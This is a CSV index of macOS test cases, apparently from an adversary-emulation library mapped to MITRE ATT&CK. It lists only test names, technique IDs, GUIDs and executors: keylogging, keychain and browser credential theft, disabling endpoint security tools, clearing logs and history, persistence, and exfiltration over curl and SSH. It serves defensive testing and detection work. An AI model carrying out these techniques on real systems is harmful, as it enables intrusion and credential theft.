discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1059.002,Command and Scripting Interpreter: AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
3 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
4 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
5 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
6 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
7 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
8 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
9 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
10 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
11 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 10 Chmod through c script 973631cf-6680-4ffa-a053-045e1b6b67ab sh
12 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 11 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
13 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
14 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
15 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
16 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
17 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
18 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
19 defense-evasion T1553.001 Subvert Trust Controls: Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
20 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
21 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
22 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
23 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
24 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
25 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
26 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
27 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
28 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
29 defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
30 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
31 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
32 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
33 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
34 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
35 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
36 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
37 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
38 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
39 defense-evasion T1647 Plist File Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
40 defense-evasion T1564.002 Hide Artifacts: Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
41 defense-evasion T1564.002 Hide Artifacts: Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
42 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
43 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
44 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 5 Disable Carbon Black Response 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c sh
45 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 6 Disable LittleSnitch 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 sh
46 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 7 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
47 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 8 Disable macOS Gatekeeper 2a821573-fb3f-4e71-92c3-daac7432f053 sh
48 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 9 Stop and unload Crowdstrike Falcon on macOS b3e7510c-2d4c-4249-a33f-591a2bc83eef sh
49 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
50 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 3 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
51 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
52 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
53 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
54 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
55 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
56 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
57 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
58 defense-evasion T1036.006 Masquerading: Space after Filename 1 Space After Filename (Manual) 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
59 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
60 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
61 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
62 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
63 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 6 Hide a Directory b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 sh
64 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
65 defense-evasion T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
66 collection T1560.001 Archive Collected Data: Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
67 collection T1560.001 Archive Collected Data: Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
68 collection T1560.001 Archive Collected Data: Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
69 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
70 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
71 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
72 collection T1056.001 Input Capture: Keylogging 7 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
73 collection T1123 Audio Capture 3 using Quicktime Player c7a0bb71-70ce-4a53-b115-881f241b795b sh
74 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
75 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
76 collection T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
77 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
78 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
79 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
80 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
81 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
82 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
83 persistence T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
84 persistence T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
85 persistence T1546.005 Event Triggered Execution: Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
86 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
87 persistence T1136.001 Create Account: Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
88 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
89 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
90 persistence T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
91 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
92 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
93 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
94 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
95 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
96 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
97 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
98 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
99 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
100 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
101 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
102 persistence T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
103 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
104 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
105 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
106 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
107 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
108 privilege-escalation T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
109 privilege-escalation T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
110 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
111 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
112 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
113 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
114 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
115 privilege-escalation T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
116 privilege-escalation T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
117 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
118 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
119 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
120 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
121 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
122 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
123 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
124 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
125 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
126 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
127 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
128 privilege-escalation T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
129 credential-access T1056.001 Input Capture: Keylogging 7 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
130 credential-access T1555.001 Credentials from Password Stores: Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
131 credential-access T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
132 credential-access T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
133 credential-access T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
134 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
135 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
136 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 14 Simulating Access to Chrome Login Data - MacOS 124e13e5-d8a1-4378-a6ee-a53cd0c7e369 sh
137 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
138 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
139 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
140 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
141 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
142 credential-access T1552.001 Unsecured Credentials: Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
143 credential-access T1552.001 Unsecured Credentials: Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
144 credential-access T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
145 credential-access T1110.004 Brute Force: Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
146 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
147 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
148 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
149 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
150 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
151 discovery T1087.001 Account Discovery: Local Account 7 Enumerate users and groups 319e9f6c-7a9e-432e-8c62-9385c803b6f2 sh
152 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
153 discovery T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
154 discovery T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
155 discovery T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
156 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
157 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
158 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
159 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
160 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
161 discovery T1082 System Information Discovery 12 Show System Integrity Protection status (MacOS) 327cc050-9e99-4c8e-99b5-1d15f2fb6b96 sh
162 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
